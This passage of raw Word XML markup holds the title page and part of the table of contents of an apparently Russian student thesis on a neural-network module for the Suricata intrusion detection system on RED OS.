          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C0ECF5C" w14:textId="77777777" w:rsidR="00B67365" w:rsidRDefault="00B67365" w:rsidP="002519A3">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70219451" w14:textId="2C0B661D" w:rsidR="003F270B" w:rsidRPr="005A1278" w:rsidRDefault="003F270B" w:rsidP="003F270B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="center" w:pos="5103"/>
          <w:tab w:val="left" w:pos="9357"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284" w:right="339"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Тема:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003F270B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00891157" w:rsidRPr="00891157">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">«Разработка нейросетевого модуля системы обнаружения вторжений </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00891157" w:rsidRPr="00891157">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00891157" w:rsidRPr="00891157">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> на базе РЕД ОС для повышения точности детекции аномалий в сетевом трафике»</w:t>
      </w:r>
      <w:r w:rsidR="00F80C9F" w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F80C9F" w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="523C507A" w14:textId="34A0D9AB" w:rsidR="002519A3" w:rsidRPr="00F80C9F" w:rsidRDefault="00F80C9F" w:rsidP="00F80C9F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4962"/>
          <w:tab w:val="right" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00512D96" w:rsidRPr="00512D96">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>МИВУ.10.03.01-07.000</w:t>
      </w:r>
      <w:r w:rsidR="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> ПЗ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="421F6D65" w14:textId="4012DA2A" w:rsidR="002519A3" w:rsidRDefault="002519A3" w:rsidP="002519A3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2268"/>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5103"/>
          <w:tab w:val="center" w:pos="7797"/>
          <w:tab w:val="right" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E4859CC" w14:textId="28A9A71A" w:rsidR="00B67365" w:rsidRDefault="00B67365" w:rsidP="002519A3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2268"/>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5103"/>
          <w:tab w:val="center" w:pos="7797"/>
          <w:tab w:val="right" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F7C4892" w14:textId="21D9A874" w:rsidR="00B67365" w:rsidRPr="00F80C9F" w:rsidRDefault="00B67365" w:rsidP="002519A3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2268"/>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5103"/>
          <w:tab w:val="center" w:pos="7797"/>
          <w:tab w:val="right" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AACC264" w14:textId="10AA5BC9" w:rsidR="00B67365" w:rsidRDefault="00B67365" w:rsidP="002519A3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2268"/>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5103"/>
          <w:tab w:val="center" w:pos="7797"/>
          <w:tab w:val="right" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="728FDF3F" w14:textId="14745AB1" w:rsidR="00B67365" w:rsidRPr="00B67365" w:rsidRDefault="00B67365" w:rsidP="002519A3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2268"/>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5103"/>
          <w:tab w:val="center" w:pos="7797"/>
          <w:tab w:val="right" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EC7F3DE" w14:textId="67E374FF" w:rsidR="00B67365" w:rsidRPr="00B67365" w:rsidRDefault="00B67365" w:rsidP="002519A3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2268"/>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5103"/>
          <w:tab w:val="center" w:pos="7797"/>
          <w:tab w:val="right" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C0C4350" w14:textId="1D7F2463" w:rsidR="00B67365" w:rsidRPr="00B67365" w:rsidRDefault="00B67365" w:rsidP="002519A3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2268"/>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5103"/>
          <w:tab w:val="center" w:pos="7797"/>
          <w:tab w:val="right" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D8EC153" w14:textId="289B6D40" w:rsidR="00B67365" w:rsidRPr="00B67365" w:rsidRDefault="00B67365" w:rsidP="003F270B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2268"/>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5103"/>
          <w:tab w:val="center" w:pos="7797"/>
          <w:tab w:val="right" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DBAF52E" w14:textId="77777777" w:rsidR="00B67365" w:rsidRPr="00B67365" w:rsidRDefault="00B67365" w:rsidP="002519A3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2268"/>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5103"/>
          <w:tab w:val="center" w:pos="7797"/>
          <w:tab w:val="right" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D6DD845" w14:textId="77777777" w:rsidR="002519A3" w:rsidRPr="002519A3" w:rsidRDefault="002519A3" w:rsidP="002519A3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2268"/>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5103"/>
          <w:tab w:val="center" w:pos="7797"/>
          <w:tab w:val="right" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AB4A138" w14:textId="6CACCBD7" w:rsidR="002519A3" w:rsidRPr="002B5F81" w:rsidRDefault="002519A3" w:rsidP="002519A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Муром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DATE  \@ "yyyy"  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B6429D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2026</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="159A3528" w14:textId="77777777" w:rsidR="004654AE" w:rsidRDefault="004654AE">
      <w:pPr>
        <w:sectPr w:rsidR="004654AE" w:rsidSect="00352169">
          <w:headerReference w:type="default" r:id="rId11"/>
          <w:footerReference w:type="default" r:id="rId12"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="851" w:right="680" w:bottom="851" w:left="1531" w:header="284" w:footer="284" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FEBC1DF" w14:textId="0279641A" w:rsidR="000B2212" w:rsidRPr="000B2212" w:rsidRDefault="003E0206" w:rsidP="00F80C9F">
      <w:pPr>
        <w:pStyle w:val="-0"/>
        <w:tabs>
          <w:tab w:val="center" w:pos="4847"/>
          <w:tab w:val="left" w:pos="7575"/>
          <w:tab w:val="left" w:pos="7890"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:caps w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:caps w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0017764F" w:rsidRPr="009D45A4">
        <w:rPr>
          <w:caps w:val="0"/>
        </w:rPr>
        <w:t>Содержание</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-497814582"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="05307C38" w14:textId="64521907" w:rsidR="000B2212" w:rsidRPr="000B2212" w:rsidRDefault="00230C61" w:rsidP="000B2212">
          <w:pPr>
            <w:pStyle w:val="12"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9685"/>
            </w:tabs>
            <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:eastAsia="ru-RU"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000B2212">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="000B2212">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="000B2212">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc231673277" w:history="1">
            <w:r w:rsidR="000B2212" w:rsidRPr="000B2212">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Введение</w:t>
            </w:r>
            <w:r w:rsidR="000B2212" w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000B2212" w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="000B2212" w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231673277 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="000B2212" w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="000B2212"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7</w:t>
            </w:r>
            <w:r w:rsidR="000B2212" w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="301A2A6A" w14:textId="0B24C303"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78" w:history="1">
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>1 Аналитический обзор</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_Toc231673278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10</w:t>
            </w:r>
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="76D9F594" w14:textId="45A05B7C"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79" w:history="1">
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>1.1 Анализ структуры данных</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_Toc231673279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10</w:t>
            </w:r>
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="22AF1D23" w14:textId="102A1FFD"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80" w:history="1">
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>1.2 Модель угроз и модель нарушителя для сетевой инфраструктуры</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_Toc231673280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12</w:t>
            </w:r>
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32FD909F" w14:textId="6C547587"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81" w:history="1">
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>1.3 Анализ существующих моделей и методов обнаружения атак</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_Toc231673281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25</w:t>
            </w:r>
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44A1F37C" w14:textId="1850D200"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82" w:history="1">
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>1.4 Оценка эффективности системы защиты данных</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_Toc231673282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30</w:t>
            </w:r>
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1406C014" w14:textId="41994552" w:rsidR="000B2212" w:rsidRPr="000B2212" w:rsidRDefault="000B2212" w:rsidP="000B2212">
          <w:pPr>
            <w:pStyle w:val="12"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="968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31673283" w:history="1">
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>2 Разработка архитектуры и моделей нейросетевого модуля</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_Toc231673283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37</w:t>
            </w:r>
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6203858C" w14:textId="524DDB55"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84" w:history="1">
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>2.1 Проектирование архитектуры нейросетевого плагина для интеграции с СОВ Suricata</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_Toc231673284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37</w:t>
            </w:r>
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C27343C" w14:textId="402B82A2"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85" w:history="1">
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>2.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Разработка модели векторизации сетевого трафика для обнаружения аномалий в зашифрованных каналах без расшифровки потока данных</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_Toc231673285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41</w:t>
            </w:r>
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="470BBC9C" w14:textId="7B4775CB"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86" w:history="1">
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>2.3 Разработка нейросетевой модели для детектирования атак, направленных на нарушение конфиденциальности и доступности информации</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_Toc231673286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43</w:t>
            </w:r>
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="284F8C35" w14:textId="44A828C4"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87" w:history="1">
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>2.4 Обеспечение защиты данных в архитектуре нейросетевого модуля</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_Toc231673287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45</w:t>
            </w:r>
